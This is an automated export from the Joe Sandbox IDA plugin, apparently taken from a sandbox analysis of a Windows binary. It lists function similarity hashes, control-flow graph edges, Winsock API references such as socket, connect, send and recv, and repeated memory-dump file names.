                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: recv
                                      • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                      • API String ID: 1507349165-640788491
                                      • Opcode ID: 02dca4111f40b2b28b475ac0a78dd165197845c3af1fa2882cf0d06b602f9570
                                      • Instruction ID: e3118d94685d8f9fb821e66a36335a27601364c2cdadeb6e7d24bc085ebaa036
                                      • Opcode Fuzzy Hash: 02dca4111f40b2b28b475ac0a78dd165197845c3af1fa2882cf0d06b602f9570
                                      • Instruction Fuzzy Hash: E4112BF5E093047BE124A719EC4AF273B6CDB86B98F45071CB81452382D620AC01C6F2

                                      Control-flow Graph
                                      control_flow_graph 1663 c075e0-c075ed 1664 c07607-c07629 socket 1663->1664 1665 c075ef-c075f6 1663->1665 1667 c0762b-c0763c call c072a0 1664->1667 1668 c0763f-c07642 1664->1668 1665->1664 1666 c075f8-c075ff 1665->1666 1669 c07601-c07602 1666->1669 1670 c07643-c07699 call c072a0 call c0cb20 call f88c50 1666->1670 1667->1668 1669->1664
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: socket
                                      • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                      • API String ID: 98920635-842387772
                                      • Opcode ID: 5e16b9b2242d0b303c08fa1617fd12a472967eed1619afc8f6b66127893738d6
                                      • Instruction ID: cd60c54da8bf92e585cc14c71ac956f8d2a265996f635860190dee0f093cad05
                                      • Opcode Fuzzy Hash: 5e16b9b2242d0b303c08fa1617fd12a472967eed1619afc8f6b66127893738d6
                                      • Instruction Fuzzy Hash: 7F1129B6E0521277D620672DEC4AF8B3B58EB81735F450A18F830923D2D712DD55D3D2

                                      Control-flow Graph
                                      control_flow_graph 1772 c3a150-c3a159 1773 c3a250 1772->1773 1774 c3a15f-c3a17b 1772->1774 1775 c3a181-c3a1ce getsockname 1774->1775 1776 c3a249-c3a24f 1774->1776 1777 c3a1d0-c3a1f5 call c1d090 1775->1777 1778 c3a1f7-c3a214 call c3ef30 1775->1778 1776->1773 1786 c3a240-c3a246 call c44f40 1777->1786 1778->1776 1783 c3a216-c3a23b call c1d090 1778->1783 1783->1786 1786->1776
                                      APIs
                                      • getsockname.WS2_32(?,?,00000080), ref: 00C3A1C7
                                      Strings
                                      • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00C3A23B
                                      • getsockname() failed with errno %d: %s, xrefs: 00C3A1F0
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: getsockname
                                      • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                      • API String ID: 3358416759-2605427207
                                      • Opcode ID: 3510f17550ef4d1105bbbd0e2de6feed25bc6bf413c82aa754104c7a3d711ea4
                                      • Instruction ID: a2337e6cba911f3e723a6b0c5a5666b1c5bcc746d393b915c0232a64b40fd7c8
                                      • Opcode Fuzzy Hash: 3510f17550ef4d1105bbbd0e2de6feed25bc6bf413c82aa754104c7a3d711ea4
                                      • Instruction Fuzzy Hash: 02210A71818280BAF7259729DC42FE7B7BCEF95324F040614F99853051FB326A8587E2

                                      Control-flow Graph
                                      control_flow_graph 1792 c1d5e0-c1d5ee 1793 c1d5f0-c1d604 call c1d690 1792->1793 1794 c1d652-c1d662 WSAStartup 1792->1794 1800 c1d606-c1d614 1793->1800 1801 c1d61b-c1d651 call c27620 1793->1801 1796 c1d670-c1d676 1794->1796 1797 c1d664-c1d66f 1794->1797 1796->1793 1799 c1d67c-c1d68d 1796->1799 1800->1801 1806 c1d616 1800->1806 1806->1801
                                      APIs
                                      • WSAStartup.WS2_32(00000202), ref: 00C1D65A
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: Startup
                                      • String ID: if_nametoindex$iphlpapi.dll
                                      • API String ID: 724789610-3097795196
                                      • Opcode ID: 2e16f5ebb56e106e96170ae76dd6f9c13b3c2db0ab7d282d460095f21a2a41c1
                                      • Instruction ID: 0d032889ef048cec69ed2cfd3a88ef5502138b222f3de1000eff52fa02f0788e
                                      • Opcode Fuzzy Hash: 2e16f5ebb56e106e96170ae76dd6f9c13b3c2db0ab7d282d460095f21a2a41c1
                                      • Instruction Fuzzy Hash: E50126D0D4138157E721BB38E91B3E635902B53304F85187CF8999619AFB69CAC8D2A3

                                      Control-flow Graph
                                      control_flow_graph 1808 ccaa30-ccaa64 1810 ccaa6a-ccaaa7 call cbe730 1808->1810 1811 ccab04-ccab09 1808->1811 1815 ccab0e-ccab13 1810->1815 1816 ccaaa9-ccaabd 1810->1816 1813 ccae80-ccae89 1811->1813 1819 ccae2e 1815->1819 1817 ccaabf-ccaac7 1816->1817 1818 ccab18-ccab50 1816->1818 1817->1819 1821 ccaacd-ccab02 1817->1821 1824 ccab58-ccab6d 1818->1824 1820 ccae30-ccae4a call cbea60 call cbebf0 1819->1820 1833 ccae4c-ccae57 1820->1833 1834 ccae75-ccae7d 1820->1834 1821->1824 1827 ccab6f-ccab73 1824->1827 1828 ccab96-ccabab socket 1824->1828 1827->1828 1830 ccab75-ccab8f 1827->1830 1828->1819 1832 ccabb1-ccabc5 1828->1832 1830->1832 1844 ccab91 1830->1844 1835 ccabc7-ccabca 1832->1835 1836 ccabd0-ccabed ioctlsocket 1832->1836 1838 ccae6e-ccae6f 1833->1838 1839 ccae59-ccae5e 1833->1839 1834->1813 1835->1836 1840 ccad2e-ccad39 1835->1840 1841 ccabef-ccac0a 1836->1841 1842 ccac10-ccac14 1836->1842 1838->1834 1839->1838 1847 ccae60-ccae6c 1839->1847 1845 ccad3b-ccad4c 1840->1845 1846 ccad52-ccad56 1840->1846 1841->1842 1853 ccae29 1841->1853 1848 ccac16-ccac31 1842->1848 1849 ccac37-ccac41 1842->1849 1844->1819 1845->1846 1845->1853 1852 ccad5c-ccad6b 1846->1852 1846->1853 1847->1834 1848->1849 1848->1853 1850 ccac7a-ccac7e 1849->1850 1851 ccac43-ccac46 1849->1851 1859 ccace7-ccacfe 1850->1859 1860 ccac80-ccac9b 1850->1860 1856 ccac4c-ccac51 1851->1856 1857 ccad04-ccad08 1851->1857 1861 ccad70-ccad78 1852->1861 1853->1819 1856->1857 1864 ccac57-ccac78 1856->1864 1857->1840 1863 ccad0a-ccad28 1857->1863 1859->1857 1860->1859 1865 ccac9d-ccacc1 1860->1865 1866 ccad7a-ccad7f 1861->1866 1867 ccada0-ccadb2 connect 1861->1867 1863->1840 1863->1853 1869 ccacc6-ccacd7 1864->1869 1865->1869 1866->1867 1870 ccad81-ccad99 1866->1870 1868 ccadb3-ccadcf 1867->1868 1876 ccae8a-ccae91 1868->1876 1877 ccadd5-ccadd8 1868->1877 1869->1853 1878 ccacdd-ccace5 1869->1878 1870->1868 1876->1820 1879 ccadda-ccaddf 1877->1879 1880 ccade1-ccadf1 1877->1880 1878->1857 1878->1859 1879->1861 1879->1880 1881 ccae0d-ccae12 1880->1881 1882 ccadf3-ccae07 1880->1882 1883 ccae1a-ccae1c call ccaf70 1881->1883 1884 ccae14-ccae17 1881->1884 1882->1881 1887 ccaea8-ccaead 1882->1887 1888 ccae21-ccae23 1883->1888 1884->1883 1887->1820 1889 ccae25-ccae27 1888->1889 1890 ccae93-ccae9d 1888->1890 1889->1820 1891 ccaeaf-ccaeb1 call cbe760 1890->1891 1892 ccae9f-ccaea6 call cbe7c0 1890->1892 1896 ccaeb6-ccaebe 1891->1896 1892->1896 1897 ccaf1a-ccaf1f 1896->1897 1898 ccaec0-ccaedb call cbe180 1896->1898 1897->1820 1898->1820 1901 ccaee1-ccaeec 1898->1901 1902 ccaeee-ccaeff 1901->1902 1903 ccaf02-ccaf06 1901->1903 1902->1903 1904 ccaf0e-ccaf15 1903->1904 1905 ccaf08-ccaf0b 1903->1905 1904->1813 1905->1904
                                      APIs
                                      • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00CCAB9B
                                      • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00CCABE4
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: ioctlsocketsocket
                                      • String ID:
                                      • API String ID: 416004797-0
                                      • Opcode ID: c6e2ca29c8007de8fb3be26e7b6c46e7a428caaeb86a881909f6dfb53f8ca23a
                                      • Instruction ID: a1b0395be99bc55ae76a089071d83f1170eb71dbadbe3e2ab8f75a7b3e708b6d
                                      • Opcode Fuzzy Hash: c6e2ca29c8007de8fb3be26e7b6c46e7a428caaeb86a881909f6dfb53f8ca23a
                                      • Instruction Fuzzy Hash: A2E1D1706003069BEB20CF24C889F6B77E5EF85308F144A2CF9A98B291D775DE54DB92
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                       • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: closesocket
                                      • String ID: FD %s:%d sclose(%d)
                                      • API String ID: 2781271927-3116021458
                                      • Opcode ID: 57379165961f54fa960a1e4a1010363a44c6956e52d668c855851f8919b63ead
                                      • Instruction ID: 6df4c965c3cb6c298c28908b6dd4977ff40aaa4990282f4dc2acb9620cd866ef
                                      • Opcode Fuzzy Hash: 57379165961f54fa960a1e4a1010363a44c6956e52d668c855851f8919b63ead
                                      • Instruction Fuzzy Hash: 00D05B2290512177C5206599AD45C5F67A5DDC6F20B070958F45077244D2209D11C3F3
                                      APIs
                                      • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00CCB29E,?,00000000,?,?), ref: 00CCB0BA
                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00CB3C41,00000000), ref: 00CCB0C1
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                       • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: ErrorLastconnect
                                      • String ID:
                                      • API String ID: 374722065-0
                                      • Opcode ID: ab37fc1c0914447ae09b7f5d24c6e858d0eddf71c2884639fbfeac2988e248d3
                                      • Instruction ID: de13381ae94391fe7c8a577bbe9bb8fcc4f4effd02f7d8a7ec3ace4d296f61cb
                                      • Opcode Fuzzy Hash: ab37fc1c0914447ae09b7f5d24c6e858d0eddf71c2884639fbfeac2988e248d3
                                      • Instruction Fuzzy Hash: 2401D4762042009BCA205AB9DC84FABB799FF89364F040B68F978931E1D726EE509752
                                      APIs
                                      • gethostname.WS2_32(00000000,00000040), ref: 00CB4AA5
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                       • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: gethostname
                                      • String ID:
                                      • API String ID: 144339138-0
                                      • Opcode ID: 97029593ca3180e4cdd97da0e6f3060650774077540c9bc7f1dc51bfab9d5a0b
                                      • Instruction ID: 46fb22e6bff6dfc1cf1f80d3d9a53eb2ab29578584bbffd45a79ef16a75b58f9
                                      • Opcode Fuzzy Hash: 97029593ca3180e4cdd97da0e6f3060650774077540c9bc7f1dc51bfab9d5a0b
                                      • Instruction Fuzzy Hash: 5451E570A08B008FEB389F29DD497A376E8EF01315F14193CEA9A866D3E775E944D702
                                      APIs
                                      • getsockname.WS2_32(?,?,00000080), ref: 00CCAFD1
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                       • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: getsockname
                                      • String ID:
                                      • API String ID: 3358416759-0
                                      • Opcode ID: 7fba6f6919f4ed548c81850dc2fe02712228fdf171397c643f500714d7cfa76b
                                      • Instruction ID: 6bca6e8e48739631b8478fcf97dd9b2e90bee1f683dc4be78b7208d069c101ae
                                      • Opcode Fuzzy Hash: 7fba6f6919f4ed548c81850dc2fe02712228fdf171397c643f500714d7cfa76b
                                      • Instruction Fuzzy Hash: 0C11967080878595EB268F58D406BF6B3F4EFD1329F10961CE5A942150F7725AC68BD2
                                      APIs
                                      • send.WS2_32(?,?,?,00000000,00000000,?), ref: 00CCA97E
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                       • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID: send
                                      • String ID:
                                      • API String ID: 2809346765-0
                                      • Opcode ID: 8f6c20bd5ddbb80ca77bb47f6c960523bb836df6148d16f56034e4b8d2f346ab
                                      • Instruction ID: f9feae7c188eae784e698ae1025d0bd62346a25ebe3f3013582035eb9c7b1f82
                                      • Opcode Fuzzy Hash: 8f6c20bd5ddbb80ca77bb47f6c960523bb836df6148d16f56034e4b8d2f346ab
                                      • Instruction Fuzzy Hash: 4701A272B01714AFC6148F24DC86F5ABBA5EF84720F06865DEA982B361C331AC108BD1
                                      APIs
                                      • socket.WS2_32(?,00CCB280,00000000,-00000001,00000000,00CCB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00CCAF67
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                       • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmp
